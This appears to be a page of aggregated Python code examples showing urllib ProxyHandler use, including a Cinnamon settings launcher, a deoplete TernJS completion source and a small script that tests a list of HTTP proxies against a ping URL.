    setproctitle("cinnamon-settings")
    import signal

    ps = proxygsettings.get_proxy_settings()
    if ps:
        proxy = urllib.ProxyHandler(ps)
    else:
        proxy = urllib.ProxyHandler()
    urllib.install_opener(urllib.build_opener(proxy))

    window = MainWindow()
    signal.signal(signal.SIGINT, window.quit)
    Gtk.main()
Exemple #28
0
 def install_proxy(proxy_handler):
     proxy_support = request.ProxyHandler(proxy_handler)
     opener = request.build_opener(proxy_support)
     request.install_opener(opener)
Exemple #29
0
import json
import http
import platform
import subprocess
import threading

from urllib import request
from urllib.error import HTTPError
from urllib.error import URLError

from deoplete.source.base import Base

is_window = platform.system() == 'Windows'
import_re = r'require\(\s*["\'][@\w\./-]*$|from\s+["\'][@\w\./\-]*$'
import_pattern = re.compile(import_re)
opener = request.build_opener(request.ProxyHandler({}))


class Source(Base):
    def __init__(self, vim):
        super(Source, self).__init__(vim)

        self.name = 'tern'
        self.mark = '[TernJS]'
        self.input_pattern = (r'\w+|[\.\{@\'"]\s*[-/]?\w*')
        self.rank = 900
        self.is_volatile = True
        self.filetypes = ['javascript']
        if 'deoplete#sources#ternjs#filetypes' in vim.vars:
            self.filetypes.extend(
                vim.vars['deoplete#sources#ternjs#filetypes'])
Exemple #30
0
import datetime
import urllib.request as urllib2

now = datetime.datetime.now()
started = now.strftime("%Y-%m-%d %H:%M:%S")

addresses = ['177.99.206.82:8080','34.83.71.102:8080','37.120.159.64:80','118.174.46.144:45330']
# address = '37.120.159.64:80'
for address in addresses:
    try:
        proxy_handler = urllib2.ProxyHandler({'http': address})
        opener = urllib2.build_opener(proxy_handler)
        opener.addheaders = [('User-agent', 'Mozilla/5.0')]
        urllib2.install_opener(opener)
        req = urllib2.Request("http://103.41.204.195/ping.php")
        sock = urllib2.urlopen(req, timeout=10)
        rs = sock.read(1000)
        print(rs)
        if rs is None:
            proxy_result = "No"
        else:
            proxy_result = "Yes"
        now = datetime.datetime.now()
        finished = now.strftime("%Y-%m-%d %H:%M:%S")
    except:
        proxy_result = "No"
        now = datetime.datetime.now()
        finished = now.strftime("%Y-%m-%d %H:%M:%S")

    print(address,proxy_result,started,finished)